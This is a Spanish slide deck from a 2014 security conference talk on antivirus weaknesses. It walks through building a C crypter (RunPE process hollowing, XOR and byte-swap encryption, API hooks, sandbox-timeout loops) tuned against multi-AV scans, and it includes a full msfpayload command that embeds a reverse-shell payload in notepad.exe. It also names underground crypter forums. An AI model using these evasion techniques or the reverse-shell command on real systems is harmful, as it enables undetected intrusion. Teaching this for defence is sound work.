Upload
incide
View
231
Download
3
Embed Size (px)
DESCRIPTION
Charla 'Desmitificando el AntiVirus' Abraham Pasamar, Navaja Negra 2014 #NN4ed CON Demo: * Pruebas crypter * Ataque ingenieria social: email+word con macro (downloader de Malware protegido con crypter FUD) Video 1/ http://youtu.be/wPPmRgQNF24 * Ataque 0day con Sandworm (powerpoint) Video 2/ https://www.youtube.com/watch?v=5hJddep-y80 Video 3/ https://www.youtube.com/watch?v=gZAndZB0Jqk
Citation preview
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
Desmitificando el AntiVirus
Desmitificando el AntiVirus
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Sobre mi:!Abraham Pasamar @apasamar!CEO Incide [email protected]!www.incide.es PGP key ID:! 0x3ee5fcf7693108b4 !+10 años seguridad! Computer Forensics! Incident Response! Expert Witness! Pentesting
PASSWORD:
1234567
Whoami
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
Efectividad de los Antivirus
Crypters C Crypter
Evasión de Antivirus
DEMO
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
AgradecimientosJose Selvi
Abel Gómez
camisetasfrikis.es
Vrillon/Venon
Creative Commons
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
¿Nos protegen?
¿Hasta qué punto?
Sí
Todo lo que pueden
respecto de las ‘infecciones’ comunes
y lo que pueden ‘prever’
Antivirus
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
¿Nos protegen? No mucho
Cybercriminales
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Ataque dirigido (APT)
Las defensas convencionales son insuficientes
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
¿Nos protegen? No mucho
Cybercriminales
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Ataque dirigido (APT)
Las defensas convencionales son insuficientes
Ataque con arma desconocida
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
PRESS
Brian Dye, CEO de Symantec
mayo 2014
Paradigma ha cambiado —> protección AV host/perimetro es insuficiente
Navaja Negra 2014 - #NN4ed Abraham Pasamar (@apasamar)
AV: ¿Cómo funcionan?Escanean binarios en el DISCO
¿Escanean en MEMORIA? algunos y poco :(
Buscan TÉCNICAS MALICIOSAS (heurística)
Buscan FIRMAS @ AV BBDD
SANDBOX (ejecución parcial) Tiempo Real
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
MALWARE = $$$$$$$
¿Por qué evadir AV’s?
Botnets, Ransomware, …
APT
Auditoría, Pentesting
BAD GUYS:
GOOD GUYS:
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Encoders¿Cómo evadir AV’s?
Packers
Crypters
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Encoders
Packers
Crypters
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
MALWARE suele ser una pieza compleja.!Crypter es mucho más simple.!
Permite proteger malware detectado. !REUTILIZACIÓN
TIP:!Método Público = MAL!Método Privado = BIEN
¿Cómo evadir AV’s?
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
¿Información sobre Crypters?Papers
“Abusing File Processing in Malware Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
“Hyperion:
Implementation of a PE-Crypter”(2012)
Christian Ammann http://www.nullsecurity.net/
“One packer to rule them all: Empirical identification, comparison and circumvention of current Antivirus detection techniques”(BruCON 2014)
Arne Swinnen,Alaeddine Mesbahi
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Manuales
Foros Underground
Video-Tutoriales
Binarios
Código
Herramientas
Multi AV-Scanners
Enlaces:
http://www.indetectables.net
http://www.udtools.net
http://www.masters-hackers.info
http://www.level-23.biz
http://www.corp-51.net
http://www.underc0de.org
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
¿Qué es un Crypter?Software creado para ocultar código malicioso y hacerlo indetectable a los antivirus (FUD)
STUB
MALWARE DETECTADO
MALWARE CIFRADO
XOR, RC4, ...
!!!!!!!!!
CRYPTER + STUB
STUB
CRYPTER (Builder)
exe dll
recurso
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Builder / Stub
Builder: !Se encarga de componer el
nuevo ejecutable.
!Builder (Malware Detectado) =
!Stub + Malware Cifrado
Stub: !Se encarga de: * Descifrar el Malware Cifrado * Ejecutarlo directamente en memoria sin que el Malware toque el disco
!Pieza más importante Se enfrenta a los AV’s
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
RunPE o Dynamic ForkingCreateProcess
PRO
CES
O
1(CREATE_SUSPENDED)
GetThreadContext
PEB EBX
EAX
BaseAddress 1
EP I
+8
PRO
CES
O
2
ReadFile WriteProcessMemoryEP 2
BaseAddress 2
SetThreadContextResumeThread
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Let’s code a C CrypterBuilder
STUB MALWARE CIFRADO
MALWARE
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
RUTINA DE CIFRADO
Let’s code a C CrypterBuilder
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
STUB+FIRMA+MALWARE CIFRADO
Let’s code a C CrypterBuilder
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Descifrado (decryptbuffer=XOR[buffer])
Let’s code a C CrypterStub
Localizar la FIRMA SEPARADORA
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Let’s code a C CrypterStub
Estructuras cabecera ejecutableCreateProcess (CREATE_SUSPEND)
WriteProcessMemoryResumeThread
Arrancar el proceso en memoria (Dynamic Forking)
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Let’s SCAN the CrypterMulti AV SCAN
TROJAN SERVER (Darkcomet). SIN CRYPTER
TROJAN SERVER CRYPTED (stub+[crypted Darkcomet])
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Improving the Crypter:( 13 Signatures … ¿ Qué podemos hacer ?
API HOOKS :)GetProcAddress
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Let’s SCAN the CrypterMulti AV SCAN
V1 - Original Crypter V2 - API Hooks
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Añadiendo soporte para parámetros
main —> WinMain (nCmdLine)
Improving the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Cambiando la rutina de cifradoXOR —> byte SWAP
Improving the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Let’s SCAN the CrypterMulti AV SCAN
V2 - API Hooks V3 - Parameters & byte Swap
Ooohhh!!!
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
¡¡¡ Matemos las firmas heurísticas !!!
Exhausting routine
FIRMAS indican HEURISTICA
junk code
big loop
Improving the Crypter
SANDBOX —> Time Out
ANTIVIRUS SANDBOX!REAL TIME DETECTION!
No es posible procesarlo en tiempo real
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Multi AV SCANV4 - Exhausting Routine
OH YEAH !!!V3 - Parameters & byte Swap
Let’s SCAN the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
FIRMAS EstáticasAVAST
Método de cifradoVariante: SWAP +/- 1
Improving the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
FIRMAS EstáticasAVIRA
Firmas Cabecera (CRC/clusterización) - FLAGS Sección
CAMBIAMOS FLAGs VALOR NO ESPERADO
Improving the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Multi AV SCANV4 - Exhausting Routine V6 - Cifrado+ & patch Flags
Awesome!!!
Let’s SCAN the Crypter
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Crypter en C (FUD)
Probarlo en un ataque
Ingenería social (1 click)
Word + Macro (downloader)
Ejecución FUD-Trojan en TR
DEMO
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Bypass AVs es POSIBLE—-> Compromiso INFORMACIÓN
Necesario prestar atención al COMPORTAMIENTOAlgunos elementos a considerar:
Perímetro (callbacks C&C)
SANDBOX
Contexto
Conclusiones
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Imágenes
http://broadbandandsocialjustice.org/
http://www.gratisography.com/
Flickr, user: eviltomthai
Chiswick Chap - Own work
Banco Imáges Propio
Abraham Pasamar (@apasamar)Navaja Negra 2014 - #NN4ed
Gracias
Avda. Diagonal, 640 6ª Planta! 08017 [email protected]!http://www.incide.es!1NC1D3!http://www.incide.es/blog-incide/!http://www.youtube.com/incidetube!Companies > INCIDE - Investigación Digital!Tel./Fax. +34 932 546 277 / +34 932 546 314!
apasamarINCIDE